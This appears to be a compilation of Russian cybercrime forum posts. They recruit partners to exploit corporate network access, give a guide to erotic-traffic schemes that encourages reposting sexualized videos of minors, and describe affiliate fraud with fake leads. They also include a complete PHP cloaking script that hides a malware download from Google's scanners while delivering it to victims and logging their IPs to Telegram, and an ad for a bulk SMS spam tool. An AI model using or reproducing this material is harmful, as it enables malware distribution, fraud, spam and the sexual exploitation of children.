Друзья, траферы, кто ещё не имеет достаточного опыта и не знает офферы на которые можно лить, рабочие ключи и тд. Вы нихрена не понимате в корп инсталлах с трафика так же как и я, так почему вы думате что за ваше обучение я должен платить? Вы так же как и я хотите зарабатывать, я же не предлагаю вам, чтобы я учился на вашем материале брать админа домена, я уже всё умею.
Что я делаю не так?
Меня интересуют корп инсталлы. Ниодного инсталла пока на моем опыте нет. Софты
паблик, дорогие. Офферов оттестированных нет. Если вы хотите тестировать и вам
нужно подсказать офферы, идеи есть, ничего супер приватного, просто софты и
направления из опыта работы по рдп.
Я умею справляться с сетками любых размеров качественно. Миллионов баксов
никому не обещаю. Заработок зависит не только от меня но и от вас в такой же
равной степени. Если вы можете делать поток доступов, я могу обеспечить его
обработку, для обработки имеются свои приватные софты.
P.S. Друзья, конечно мое предложение выглядит не столько привлекательно, каким рисуют вам его потенциальные кидалы с супер приватными софтами и миллионами баксов. Но оно я вас уверяю реальное и абсолютно жизнеспособное.
Автор:sabahulnoor
Источник: https://xss.is
Привет! Данная тема создана для понимания стандартных методов эротического трафика.
Так как это только первая часть, в ней будут много обьяснений которые вы возможно посчитаете водяными и неуместными, однако я вас уверяю, что вам надо знать своего покупателя с научной точки зрения, а не с обывательской, дабы понимать как играть на психике людей. Вы обязаны вытерпеть огромный кусок текста в начале, чтобы держать руку на пульсе происходящего!
Похоть - данное явление существовало с самого начала человеческого бытия, и те кто умеет думать головой, а не головкой всегда успешно на этом наживались. Это сильное желание или тяга к чему-либо, как правило, связано с вещами сексуального характера. Это часто связано с сильным физическим влечением или сексуальным возбуждением и может быть мощной силой, способной влиять на мысли и поведение человека.
Как насчёт использовать это для заработка?
Начнём с начала. Наверное каждому хоть раз в жизни попадалась реклама эротического характера. Не важно где вы серфите интернет, на каком-нибудь из сайтах будет заманивающий слоган играющий на ваших низменных инстинктах который выглядит как-то так:
Моей сестре 18 лет.Я много раз видел её без одежды.Так как мы с раннего детства с ней вместе, то она не стесняется пройти передо мной,например,без лифчика,а то и вовсе без трусиков.Позавчера она ходила на девичник к подруге,где нормально прибухнула и домой пришла уже поздно.Родители спали.Я тихо открыл ей дверь,помог дойти до ванной,чтобы привезти себя в порядок.На ногах она еле стояла,и снять одежду самой ей было нереально,поэтому она меня попросила помочь ей.Я снял с неё кофточку,стащил платье,потом колготки.Я уже даже начал..... читать продолжение (гиперссылка)
Click to expand...
К подобным баннерам/постам чаще всего прикрепляют фото на которой особь
мужского пола трогает женские части тела.
Для того чтобы не испытывать судьбу и не злить админа я решил в этом посте не
раскатывать губу и не закидывать порно-картинками все пространство, так как
думаю вы и сами вполне способны представить описанные мной вещи, фото буду
вставлять там где это крайне необходимо.
Как правило у людей даже не возникает мысли о том что это такое и к чему это.
Эротический контент стал настолько неотьемлимой частью цифровой жизни, что мы
даже не обращаем на это внимание.
Я предлагаю вам обратить свой взор на данную сферу.
Для вашего понимания я назвал данную сферу - 'Эротической', а постоянных
пользователей данной сферы которые и являются причиной нашего обогащения -
'Мастурбаторы'.
Эротическая сфера делится на многие категории и подкатегории и существует
множество способов легких и не очень превратить внимание в деньги.
Для начала разделим данную сферу на такие категории которые можно
монетизировать и посмотрим на сложность их реализации:
Порнография: Сюда входят откровенные видео, фотографии и другой контент, предназначенный для сексуального возбуждения зрителя. Порнографию можно дополнительно разделить на подкатегории в зависимости от содержания.
СЛОЖНОСТЬ - НИЗКАЯ
Эротическая литература: Сюда входят рассказы, стихи и т.д., посвященные сексуальным темам и содержанию. Эротическую литературу можно найти на различных веб-сайтах, форумах и платформах электронных книг.
СЛОЖНОСТЬ - НИЗКАЯ
Сайты знакомств и знакомств для взрослых: эти сайты предназначены для облегчения сексуальных контактов между взрослыми людьми по обоюдному согласию. Они могут включать в себя такие функции, как алгоритмы поиска партнеров, чаты и личные сообщения.
СЛОЖНОСТЬ - ВЫСОКАЯ
Сексуальное образование и советы: эти веб-сайты и блоги предоставляют информацию и советы по широкому кругу сексуальных тем, включая здоровье, отношения и техники.
СЛОЖНОСТЬ - НИЗКАЯ
Развлекательные программы для взрослых и живые выступления: это включает в себя моделирование с веб-камеры, прямые трансляции и другие формы онлайн-представлений, включающие материалы сексуального характера.
СЛОЖНОСТЬ - СРЕДНЯЯ
Товары и услуги для взрослых: к ним относятся секс-игрушки, новинки для взрослых, нижнее белье и другие товары, предназначенные для повышения сексуального удовольствия.
СЛОЖНОСТЬ - ВЫСОКАЯ
Предлагаю откинуть высокие сложности и перейти к низким. (Так как нас интересуют именно деньги, и мы не Guts чтобы искать счастье в сложностях.)
Начнём с 1. Порнография.
Чтобы монетизировать порнографию, надо перелить аудиторию откуда-то -> куда-
то. Для привлечения аудитории нам следует выбрать социальные сети, по моему
мнению самые легкие - TikTok и Telegram.
И возможно Odnoklassniki.__(Да, вы не ошиблись прочтя это. Старые пердуны те
ещё др041лы которые готовы заплатить хорошие деньги за все вышеперечисленное)
Именно на примере данных 2 соц.сетей я покажу вам вводную часть гайда.
Откуда? Из Tik-Tok
Куда? В Telegram
Как?
|
Начнём с TikTok:
Для нас есть много различных способов привлечь аудиторию, но...
Главной причиной выбора этой сети является её алгоритм.
Алгоритм TikTok предназначен для продвижения привлекательного и популярного
контента среди пользователей, независимо от того, кто его создал. Это
означает, что даже пользователи с небольшим количеством подписчиков
потенциально могут охватить огромную аудиторию, если их контент резонирует с
алгоритмом TikTok. Это именно то что нам нужно!
Заходим на любой ресурс продажи аккаунтов -> выбираем категорию Tik-Tok ->
фильтруем категорию по количеству подписчиков, состоянию аккаунта, общей
активности, причине продажи, если подобные функции доступны на выбранном вам
ресурсе ->выбираем честного по вашему мнению продавца -> покупаем, для начала
достаточно 1 аккаунта.
либо
Создаём аккаунт с нуля через аренду номера, хотя можно даже на свои данные или
данные вашего друга.
Переходим к оформлению аккаунта и уклонению от вероятного shadowBan:
1. Аватар
Как всегда у нас есть несколько вариантов развития событий. Но для начала (а я
предпологаю что вы начинающий раз читаете данную статью) воспользуйтесь
сервисом Canva. Он позволяет бесплатно создать любой интересующий вас дизайн с
красивыми эффектами. Советую использовать GIF-файлы, эротического содержания,
которые потом вы сможете успешно установить в качестве видео аватара для
своего Telegram.
2. Название
Любое название которое может сочетаться в голове мужчины с эротикой, то есть
достаточно простого слова 'девушка' в названии. Я выбрал для себя 'Girls make
my day'. Данное название будет так же использовано вами в вашем Telegram.
3. Описание
Описание вашего аккаунта для Tik-Tok может отличаться от Telegram. Не делайте
толстых описаний, достаточно простого 'Hope you enjoy my content' или же
'Захаживайте в наш телеграм)' . Никогда не вставляйте ссылку на ваш телеграм в
описание Tik-Tok аккаунта.
Итак, что у меня получилось? (Так как у меня идентичное описание и аватар в 2
соц сетях я вставляю из телеграма так как мне лень заходить в тт)
Для англ аудитории:
Для Ру аудитории:
В качестве аватара использована модель - Рената Ри (Валлиулина), её материалы
так же взяты из открытых источников.
Что дальше?
Заполняем немного канал, привыкаем использовать ботов для постинга, учимся
привлекать аудиторию к постам.
1. Чем заполнять канал?
Советую выбрать определенный стиль ведения канала, например:
Данный пост взят из моего самого первого канала, я нащупал такой стиль и делал
всё очень стильно как я считаю. 3 строчки, на первой упомянуть кто на
изображении/видео, на второй сколько контента есть в моём приват канале куда я
слил все её достопримечательности и цифры взятые с потолка, на третий
повторный зазыв в VIP канал. (Как и любой человек я не раскрою вам то как я
привлекаю аудиторию на данный момент, придумайте свой способ сами).
Помните я заливал вам про психику и психологию в начале? Именно тут ваша СИ
проявляется в полной мере.
Затрагивайте то что хотел бы увидеть/услышать каждый мужчина, например:
'Она сделала это в центре города?',
'Хотите солью видео где она попросила внутрь?',
'Она без трусиков на видео? Куда парень смотрит?',
'Видно как промокла, да?'.
Как видно из примеров, всё что требуется для успеха в сфере эротики это понимание в первую очередь себя, как похотливое животное, каким является любой мужчина. Таким образом можно успешно управлять вниманием любого мужчины на планете.
Позже я создам статью в разделе СИ о том как я пытался прокачать этот навык(наивный) и что из этого вышло.
Даю подсказку - используйте смайлики и эмоджи, всё что используют не особо далекие в цифровой эмпатии люди привлекает этих самых людей. Так же подскажу, зазывать в VIP когда на вашем канале менее 20 постов слишком дерзкая авантюра, на которую редко когда ведутся идиоты, однако если сделать пост в стиле:
'Мы очень быстро набрали аудиторию и как мы видим, нас часто просят открыть доступ ко всем материалам этих LLIлюх, мы открываем возможность приобрести доступ в наш VIP канал, за подробностями можете обратиться к нашему менеджеру: @менеджер'
Click to expand...
2. Боты для постинга. Любой на ваш вкус и цвет, я советовать ничего не хотел
бы, но скажу что пользуюсь Fleep. Однако держите в голове, что он платный и
есть бесплатные аналоги, я пользуюсь тем что мне удобнее.
Суть ботов для постинга в том, чтобы вы посидели 30 минут вечером и
посоздавали постов, которые потом целый день или даже неделю будут выходить у
вас в канале, дабы вы не задумывались о том, что бы мне туда запостить, а
работали с привлечением аудитории и собственно монетизацией.
3. Как привлекать аудиторию к себе, постам, каналу, сайту, аккаунту?
Давайте для начала разобьём ценники Эротической сферы контента по приходу
аудитории и качеству:
Давайте разберём только 2 соц сети упомянутые выше. А в продолжении, я сделаю
описание всех способов на которые я разделил сферу Эротики.
Итак телеграм.
Скажу сразу, способы любой рассылки с правильным текстом - ваше счастье. В
моем случае - закуп на 5к сообщений в ЛС по цене 2р за сообщение. Пришло 2к
новой аудитории, из этих 2к - 50 человек купили приват в который я заливал тех
же моделей без цензуры. Стоимость привата - 500р в месяц. Выводы делайте сами.
Реклама в ботах - ваше счастье в квадрате если вы умело выбрали бота, как
именно их выбирать чтобы найти нужную вам аудиторию? Думайте сами, тут вам не
подскажу. На моей памяти я нашел бота с постоянной аудиторией в 25к человек в
которой админ решил продать мне рекламу за 6к (это является сверх дешевым
оффером), я думал что меня заскамят, однако решился вкинуть свои 6к на
подобную рулетку счастья и удивился когда с моих 6к пришло 1к человек. Во
первых это 3.14здец как много! Во вторых я уложился в 6р за приход, что
является очень приемлимым. Не могу сказать сколько из этих людей купило VIP
так как на тот момент я уже продавал кое-что другое, однако это было
прибыльно.
Так же в Telegram есть сообщества администраторов каналов, которые переливают
друг другу аудиторию, например такие:
Туда пускают всех кого заметили в теме каналоведения телеграм, в данном случае
это чат эротических каналов.
Видим подобное объявление:
Делаем то же самое, а то есть: привет хочу купить на вечер в 19:00 по мск, вот
мой креатив рекламный(креатив), кидай киви или карту или адрес крипты для
оплаты.
Насчёт покупки из других источников, а так же подробнее про перелив аудитории
с каналов на канал сделаю отдельную статью.
На последок вы спросите меня:
Стоп, а где же про тикток?
Click to expand...
И я отвечу:
Самый легкий способ - залить то же что и в канал, цензуря часть тела и поставить в теги #FAKEBODY
Click to expand...
И да, тикток оказывается не банит тег #fakebody если вы зацензурите (хотя бы
просто blur) оголенную часть тела. Так же вы можете заливать малолетних
пр0ститут0к которые пытаются оголить всевозможные части тела, при этом надевая
короткие юбки и чулки как настоящие порноактриссы.
Часть про ТикТок настолько маленькая потому что тут и думать не надо,
заливайте что угодно соблюдая немного правила указанные в соглашении
пользователя и аудитория к вам придёт.
Например у меня залетело видео которое я нагло скачал с YouTubeShorts где
девушка(или сколько ей лет, мне вообще всё равно лишь бы привлекала аудиторию
ха-ха) танцует под модную музыку Miss The Rage:
То есть как вы поняли вам даже делать самим ничего не надо чтобы получить аудиторию, перезаливайте оголенные части тела женщин/девушек/девочек в ТикТок (или же наоборот в YoutubeShorts) и получайте вашу буквально БЕСПЛАТНУЮ аудиторию.
У данного поста будет продолжение и скорее всего не одно, поэтому если
интересно, задавайте вопросов так много как возможно, я отвечу на них всех в
следующей статье.
Ставьте лайки подписывайтесь на канал всем удачи и всем пока.
Лед тронулся,господа присяжные заседатели!
В данной статье описываю возможность как заработать на мотивированном трафике или фроде ПП. Вертикаль - товарка. Эту схему реализовать сможет практически каждый. Суть данной схемы заключается в работе с ПП и CPA офферами ( товарка ).
**Краткая вводная информация :
- CPA** («Cost Per Action», оплата за действие). Нам платят за подтвержденную заявку по телефону.
- CPA-офферы - Допустим, производитель БАДов поставляет свою продукцию в супермаркеты и он-лайн гипермаркеты, но этого недостаточно. Также у него есть команда, которая продвигает этот Бад в интернете, используя различные доступные источники трафика: например, рекламирует товар в Facebook, Google, Navite, Push и тд.
Понятно, что возможности внутренней команды ограничены бюджетом на привлечение новых клиентов и рабочим временем.
В этих случаях рекламодатели могут предлагать свой товар через посредников (арбитражников), которые сами ищут, где его продавать и получают за это ту самую выплату в случае удачной продажи.
Интернет-маркетолог или арбитражник сам ищет, где и каким способом рекламировать средство. Он платит за показ рекламы в Инстаграмме или за покупку рекламы в сетке предоставляющей пуш-трафик.
- Мотивированный трафик - (Incentive traffic, мотив) — действия
пользователей, за которые они получают вознаграждение.
Вебмастера оплачивают вознаграждение пользователям за принятую заявку или
установку приложения, а далее – получают большее вознаграждение за
привлеченный трафик от партнерки. Выгода – в разнице между полученными
деньгами от партнерской программы и оплаченной суммой пользователям.
Бензин ваш — идеи наши.
Click to expand...
С чего стоит начать :
Нам нужны люди с симкартами определенного ГЕО и знанием местного языка по которому мы собираемся работать.
Или как вариант использовать SIP телефонию, Skype номера и тд. Но лучше всего
использовать физические симкарты. На эти номера будут звонить с кол-центра
после оформления заявки для ее подтверждения . Задача подтвердить данные
которые мы ввели на лендинге. На моем опыте по РУ - СНГ принимать такие заявки
бессмысленно. В 95% случаев вам ничего не выплатят.
Возможно у кого то уже есть аккаунты в пп с реальными лидами и трафиком, это будет большим плюсом для вас.
Мы в свою же очередь будем выполнять сразу все этапы сами.
Выбор оффера - создаем видимость запуска рекламы - фейк трафик - создание заявок - прием звонков.
Регистрируем аккаунт в одной из партнерских программ. ( какую выбрать партнерку спойлерить не буду, решать уже вам, легко найти их в поисковике). Выбираем партнерку из самых топовых на Европу. Почему именно топовых, чаще всего такие пп работают на репутацию сервиса и шанс что они выплатят вам деньги максимальный. А если кто-то решит взять ноу-нейм партнерку, большая вероятность что вам повесят холд на 7-14 дней и врятли что-то вы получите. После регистрации вам должны одобрить аккаунт. В ТГ могут задать вопросы из разряда: где раньше лили траф, сколько времени занимаетесь арбитражом и могут запросить скрины личных кабинетов из других партнерок. Если всё красиво расписать и ответить на вопросы это будет вам только на руку. После общения вы так же можете попросить повысить ставку на офер (товар) который вы будете абузить. К вам будет больше доверия. И по запросу день в день могут выплачивать вам деньги. Менеджеру так же выгодно вам помогать и решать все ваши проблемы. СИ наше всё). После всех манипуляций идем в личный кабинет и выбираем офер под нужное нам гео. Берем лучше тот который сейчас в топе, более популярен и с максимальной суммой выплаты). В среднем по Европе payout 30-40usd за каждый апрувнутый лид.
Вы довольно пошлый человек,… вы любите деньги больше, чем надо.
Click to expand...
Следующий этап сделать видимость что мы запустили трафик на этот офер. В ЛК генерируем себе линк - cсылку. И через сервисы накрутки кликов - трафика за 100-200 рублей запускаем трафик на нашу ссылку с лк. Если вы выбрали прелендинг и лендинг, запускаем 2 компании в пропорции 1к3. 100 кликов ( переходов на прелендинг ) и 30 кликов( переходов на лендинг). Из 30 кликов на лендинг делаем максимум 1-2 валидные заявки и еще 1-2 фейковые. Выставляем время , кол-во кликов и так же гео которое мы выбрали для старта.( не всегда важно гео переходов, просто будет хорошим плюсом если есть такая функция на бирже и возможность).
Так же стоит делать фейк заявки на левые номера и данные. Какие-то будут падать в холд, какие - то заявки в трэш. Создаем полную атмосферу вокруг нашего профиля , что мы реально делаем трафик. Это занимает минимум времени. За то результат будет оправдан.
Дальше идет манипуляция с приемом звонков. Человек который принимает звонок должен знать какой именно оффер (товар) вы оформили и ФИО , что бы быть готовым ответить на вопросы. Адрес куда доставить товар лучше подбирать максимально реальный, тк некоторые кц проверяют адрес в гугл-мэпс и если вы взяли его с генератора его может вообще не существовать. После подтверждения заявки в ЛК через мин. 10-15 увидите подтвержденный лид.
Линки, пп , офферы , страны не спойлерю. У каждого есть свои возможности воплотить данный способ в жизнь. Так же данный вид мотивированного трафика можно использовать и для других вертикалей, например гэмблинг. Но для гэмблинга существенно больше вложений требует этот способ и большая вероятность что вам забракуют ваш мотив-траф.
Первая статья которую писал для форума. Возможно есть какие то ошибки , строго не судите. Постарался уместить всё лаконично и понятно без лишнего текста.
А нам грубиянов не надо. Мы сами грубияны.
Click to expand...
Приветствую всех.
Статья, в основном, для новичков. Но может быть какие-то интересные моменты
или идеи найдут для себя и "бывалые".
Приятного прочтения.
Предисловие.(Если тебе быстро и по делу - пропускай, переходи сразу к разделу "Создаем свой shit ", тут кулл-стори)
За окном зима. Все по-немногу отходили от новогодних праздников. Кроме
подарков, полученных от родных и близких, все мы получили еще один общий
подарок - довольно крупное обновление в Google.
Это обновление было незаметно для рядовых пользователей, но большинство тех,
кто так или иначе, в своей работе выдает "вредоносные" файлы через Chrome или
заливает различного рода приложения в Play Market, ощутили его сполна.
Выдача из Dropbox стала useless. Прилы с WebView начали отлетать раньше, чем
апрувнется первая РК. Залитый и проверенный пол часа назад файл, начал ловить
табличку "Файл вредоностный". Праздники закончились и началась гонка с IT-
корпорацией за завоевание сердец (компов) обычных и не очень граждан.
Ищем стартовую точку.
Первым делом был проведен тест и сравнение статистики разными трекающими
методами. Первый трекер: клоака на ленде, второй: трекер на кнопке "скачать",
третий: отстук на ip-logger встроенный в крипт. Результат такого трекинга был
более чем интресным, и главное, что раньше такого не наблюдалось, это
действительно было изменение в работе гугл-ботов.
Наблюдение дало следующие результаты: некторые клики по кнопке скачать не были
замечены в клоаке ни как "допущенные" ни как "заблокированные", проверка ip
этих кликов со 100% вероятностью показывала какой-либо из сервисов гугла, чаще
всего "cache.google", реже "proxy.google" и "googleusercontent". Эти же ip
стучали на ip-logger, встроенный в крипт и самое важное - прямо в стилак.
Дальше потребовалось немного времени и контроль ситуации в режиме "он-лайн".
Заливаю файл на хост, проверяю скачивание из хрома и детект ВД - все чисто.
Включаем поток, ждем. 1й - 4й клик, ip есть и в клоаке и в трекерах, проверям
файл - все в порядке. 5й клик по кнопке, в клоаке пусто, в стилак стучит бот
гугла. Проверяем линк - алерт.
Собираем всю полученную с тестов информацию в кучу и получаем такую картину
(как я ее вижу): гугл-бот ныряет прямо за юзером на блек, кликает по кнопке
скачать (либо берет линк прямо у юзера из браузера и так же качает файл). Бот
полноценно скачивает файл, запускает и принимает решение - опасен файл или
нет. Если решение, что файл опасен - линк получает алерт.
В целом задача ясна - нужно не дать боту скачать файл, приступимс.
Создаем свой shit
После проведенных тестов со сбитием хеша, уникализации линка, уникализации контента в архиве и прочих техник, я решил остановиться на одной, котрую подсмотрел (и протестировал) у BlackTDS и адаптировал. В итоге в бою этот метод показал себя как самый эффективный из простых, который продлевает файлу жизнь аж до момента пока хром не выдаст юзеру алерт с просьбой отправить файл на проверку (тут уже только блочить гугл на уровне софта, файл в таком случае берется прямо с винчестера юзера).
~~Утром стулья~~ Сначала код, ~~вечером деньги~~ после - пояснения.
PHP:Copy to clipboard
<?php
//Получение значения реферера
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
//Получение текущего домена
$currentDomain = parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST);
$expectedDomain = explode('.', $currentDomain)[count(explode('.', $currentDomain)) - 2] . '.' . explode('.', $currentDomain)[count(explode('.', $currentDomain)) - 1];
//Получение домена из реферера
$refererDomainFull = parse_url($referer, PHP_URL_HOST);
$refererDomain = explode('.', $refererDomainFull)[count(explode('.', $refererDomainFull)) - 2] . '.' . explode('.', $refererDomainFull)[count(explode('.', $refererDomainFull)) - 1];
//Проверка ip пользователя
$user_ip = $_SERVER['REMOTE_ADDR'];
// Получение имени хоста
$hostname = gethostbyaddr($user_ip);
// API Check-Host.net
$url = "https://check-host.net/ip-info?host={$user_ip}";
// Получение информации об ISP и организации
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
//Проверка значения в ISP
$isp_pos = strpos($response, 'ISP</td>');
if ($isp_pos !== false) {
$isp_start = strpos($response, '<td>', $isp_pos)+4;
$isp_end = strpos($response, '</td>', $isp_start);
$isp = substr($response, $isp_start, $isp_end - $isp_start);
} else {
$isp = 'empty';
}
//Проверка значения в Organization
$org_pos = strpos($response, 'Organization</td>');
if ($org_pos !== false) {
$org_start = strpos($response, '<td>', $org_pos)+4;
$org_end = strpos($response, '</td>', $org_start);
$org = substr($response, $org_start, $org_end - $org_start);
} else {
$org = 'empty';
}
//Проверка значения в Country
$country_pos = strpos($response, 'Country</td>');
if ($country_pos !== false) {
$country_start = strpos($response, '<td>', $country_pos)+4;
$country_end = strpos($response, '</td>', $country_start);
$country = substr($response, $country_start, $country_end - $country_start);
$country = trim(strip_tags($country));
} else {
$country = 'empty';
}
$token = "BOT_TOKEN"; // TOKEN между ковычек
$chat_id_bot = "CHAT_ID_FOR_BOTS"; // ID между ковычек
$chat_id_man = "CHAT_ID_FOR_GOODS"; // ID между ковычек
//Проверка
if (strpos($hostname, 'google') !== false
|| strpos($isp, 'google') !== false
|| strpos($org, 'google') !== false
|| strpos($hostname, 'Google') !== false
|| strpos($isp, 'Google') !== false
|| strpos($org, 'Google') !== false
|| strpos($hostname, 'GOOGLE') !== false
|| strpos($isp, 'GOOGLE') !== false
|| strpos($org, 'GOOGLE') !== false
|| empty($referer)
|| $refererDomain !== $expectedDomain)
{
// Если хотя бы одна из переменных содержит "google", пустой реферер или реферер не соответствует домену - отправляем пользователя на 404
$arr = array(
'🌐 #BOT_' => $expectedDomain,
'🔗Ip Address: ' => $user_ip,
'⛱Ip Host: ' => $hostname,
'📊Ip ISP: ' => $isp,
'🧠Ip Org: ' => $org,
'🏁Ip Country: ' => $country,
'🧊Referer Domain: ' => $refererDomain,
);
foreach($arr as $key => $value) {
$txt .= "<b>".$key."</b>".$value."\n";
};
$txt = urlencode($txt);
$sendToTelegram = fopen("https://api.telegram.org/bot{$token}/sendMessage?chat_id={$chat_id_bot}&parse_mode=html&text={$txt}","r");
if ($sendToTelegram){
header_remove();
header('Connection: close');
http_response_code(404);
die;
} else { echo "ERROR";}
} else {
// Если ни одна из переменных не содержит "google", а реферер совпадет с текущим доменом отправляем пользователя на file
$arr = array(
'🌐 #MAN_' => $expectedDomain,
'🔗Ip Address: ' => $user_ip,
'⛱Ip Host: ' => $hostname,
'📊Ip ISP: ' => $isp,
'🧠Ip Org: ' => $org,
'🏁Ip Country: ' => $country,
'🧊Referer Domain: ' => $refererDomain,
);
foreach($arr as $key => $value) {
$txt .= "<b>".$key."</b>".$value."\n";
};
$txt = urlencode($txt);
$sendToTelegram = fopen("https://api.telegram.org/bot{$token}/sendMessage?chat_id={$chat_id_man}&parse_mode=html&text={$txt}","r");
if($sendToTelegram){
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename=FILE.zip'); //Имя выданного юзеру файла
header('Content-Description: File Transfer');
readfile('https://SOMELINK.com/FOLDER/FILE.zip'); //линк на файл
die;
} else { Echo "ERROR";}
}
?>
В общем-то весь код содержит комментарии к действиям, но я все же немного разжую пошагово логику его работы, чтобы проще было модернизировать его под себя.
Первым делом мы получаем реферер пользователя, который тыкнул по кнопке
скачать, вычленяем из него корневой домен, и то же самое делаем с текущим
местом расположения нашей пыхи.
Логика всей этой движухи заключается в последующем сравнении корневого домена
реферера и корневого домена, где находится php файл, чтобы исключить попытки
скачать файл извне (если ваша пыха будет находиться на другом домене, то нужно
будет редактировать эту проверку под себя).
Следующим этапом переходим к сбору информации о пользователе. Получаем его ip, хостнейм. С имеющимся ip топаем на check-host.net и собираем дополнительную информацию об имеющемся ip.
Дальше классическое объявление токена тг-бота и чат id для "отчетов в тележку". В моем случае используется 2 chat-id, в первый я отправляю информацию о ботах, во второй об одобренных кликах (задрот статистик, да, извините).
Ну и следующий шаг - самый главный. Мы проверяем "а не гугл ли ты часом? а
если въе*ать и переспросить?". Прогоняем все полученные данных о хосте,
орагнизации, ISP и тд на наличие строки "google" в разных вариантах ее
написания, чтобы наверняка. Отсекаем пустой реферер и реферер, который не
совпадает с текущим доменом пыхи.
Ну и собственно в зависимости от результата проверки посылаем бота на 404, а
нормальному, ровному пользователю отдаем нашего зверька. По приколу можете
редиректнуть бота на рик-ролл )))))
Итоги. Результаты. Оправдания.
Начну с оправданий.
Опытные пыхеры, давайте договоримся: без ссаных тряпок, тапок и трусов в мою
сторону. Я не пыхер, сие чудо-техники писалось пошаговым тыканьем палки в
ЧатГПТ и правками того, что он выдал с помощью гугла и стаковера. Если там
что-то где-то можно было написать грамотнее и красивее - ты красава, что это
знаешь, бери, делай, пользуйся.
Продолжу результатами.
С первого дня и по сей день, все, с кем я работаю или работал пользуются этой
пыхой, объединяют ее с дополнительными трекерами и техниками по типу "выдавать
файл со старорег цпанельки" и все работает как часы. Если файл изначально
выдается без алерта, то он его не поймает достаточно продолжительное время.
Хотите верьте, хотите нет, инструмент у вас перед глазами, проверяйте сами.
Итоги?
Итоги подведите сами. Если возьмете на вооружение и понравится, можете влепить
лайк, можете просто отписать ниже, что все работает. А можете ничего не писать
и не ставить реакции, просто кайфуйте )))
Автор: Learner
Источник: https://xss.is
**Automate SMS sending with Google Voice Bulk Sender Pro by Tatsuya **: the ultimate solution to bypass restrictions and send bulk messages!
I write this article in a hurry, following the update of certain rules
concerning the sending of sms to the USA such as A2P 10DCL which asks you for
a subscription for each company which would like to send sms on American soil
which makes the obtaining a virtual number for spam very complicated.
That said, using these services is mandatory only when you want to spam with
spoofing sms.
So I turned my neurons to find a way to get around these obstacles that
prevent us from humbly earning money for those who work without sms
usurpation, and there, I thought of a service that allows you to send free sms
to any American number and which is only present on American soil: I named
"Google Voice" but here it is, sending sms to thousands of people manually is
" virtually impossible" and counterproductive especially if it s is to
send sms to a large number of people, so I decided to create a script that
would allow me to automate the process. Specifically a browser extension to
make using the tool completely simple for everyone and easy to install.
The possibility that chrome offers by allowing you to create several profiles,
will allow you with the google voice sender to send sms from several googles
voice accounts. The sender gives you the possibility to adjust the delay to
send between sms, the lowest is 5 seconds,
I have personally tested the sending of sms on 10 different profiles with 5
second intervals and I was able to send 20,000 sms per accounts to make
simple 200,000 sms in 24 hours for free and without any technical
skills.
Here's how you can do the same...
You will need......
a google voice account as you will have understood and my software that you can buy only from me for $300 , you are entitled to a lifetime license which gives all buyers the benefit of all updates for free.
**N.P: You can buy google voice for less than $10 but you can create it yourself using a vpn and paying for a service that provides real numbers there are plenty of them on the forum, it's usually $1 or less to receive codes, so for a little less than $1 you can have google voice accounts, and if you are wondering how to create unlimited gmail accounts without a phone number, just use an antidetect browser, there are plenty of them on the forum, please some choices offer free profiles.
2) Open the following address in your browser chrome://extensions/
3) Enable developer mode
4) Drag and drop app folder in chrome
5) Activate the extension
6) Open Google voice
click on the logo of the extension, once it is open enter your messages, you
can personalize the sms if you have names linked to each telephone number
using the tag {name}, putting the number followed by the name and separated by
a comma.
Once your numbers are added you can accept the terms and conditions and press send and voila, all you have to do is wait and watch your pc send the sms for you.
You can see the video of the complete installation and the software in action here
Currently I am working on a version that can do the same in other countries with other applications like google voice.
**Арбитраж трафика — это бизнес.
**
Задача в этом деле такая же, как и везде: купить дешевле, продать дороже.
Покупаемый «продукт» и есть трафик, точнее, чаше всего, покупка рекламы. К
примеру : вы купили рекламу в паблике или группе Вконтакте за 1000 рублей,
разместили рекламный пост который принес вам три подтвержденные заявки с
товарного оффера по 700 рублей. Итог: вы в плюсе. Это высокодоходный бизнес с
практически моментальной окупаемостью. Это занятие относится к
высокорискованному делу. Будьте внимательны во всем.
Наше внимание – наш самый ценный ресурс
Click to expand...
Виды офферов и рекламы.
Какой бывает арбитраж? Данную деятельность можно разделить на несколько частей: виды офферов и виды реклам.
Нужно направлять трафик имеющийся у вас в личном распоряжении: емейл база для рассылки, свой сайт или паблик в социальной сети или покупая его в виде рекламы на ваш оффер. Оффер — это предложение рекламодателя, продукт на который мы и будем привлекать трафик.
Офферы бывают:
Оплачивается, как правило, за подтвержденную заявку.
Схема: Клиент оставил заявку - Оператор созвонился с клиентом - Клиент подтвердил заказ.
Оплачивается определенный процент с продаж. Например, перешедший через вашу партнерскую ссылку, совершил покупку на Алиэкспресс. Вам моментально начисляется 8.5% на баланс в партнерской сети.
Оплачивается выполненная заявка.
Оплачивается моментально, как только человек скачает, установит и запустит
приложение по вашей ссылке.
Оплачивается за отправленную заявку или выданные деньги. Например, клиент оставил заявку, ее одобрили, получил деньги, вам начислили 700—5000 рублей.
Оплачивается за регистрации, но чаше за первый депозит. Вознаграждение
равняется
30—250$, в зависимости от оффера.
Виды рекламы:
— Контекстная реклама
Например, это объявления в поисковой выдаче, по конкретным ключевым запросам.
— Таргетированная
Трансляция объявления конкретным пользователям. Включает в себя настройку параметров пола, возраста, страны, города и тому подобного.
— Тизерная
Дразнящие баннеры, побуждающие кликнуть.
— Баннерная
Ставятся, к примеру, на подходящие тематические сайты.
— Промо-посты в социальных сетях.
Публикуются и попадают в новостную ленту пользователя, либо заказываются у администрации подходящих сообществ.
Важнее не то, что вы делаете, а то, чего вы не делаете
Click to expand...
Офферы разделяются на три категории:
рекламодателем. Сюда входят гиганты — магазины: М. Видео, Литрес. ТехноСила и
так
далее. Некоторые виды реклам принимают только белых офферов, а при размещении
серых могут не только не допустить к показам, но и заблокировать рекламный
кабинет.
предложениях. Сюда относится, например, средства от алкоголизма, потенция .
Все то, что
вызывает сомнения в пользе — серый или черный оффер.
Определения :
Пруф - доказательство.
Апрув - подтверждение.
Адалт — ресурсы или товары для взрослых.
Бурж — зарубежный.
Веб — вебмастер.
Дейтинг — знакомства.
Дор - дорвеи, дорвей.
Инста — Инстаграм.
Клоач — обман.
Конверт — конверсия (СВ).
Рекл — рекламодатель.
Трэш — неверная заявка.
Как работать? :
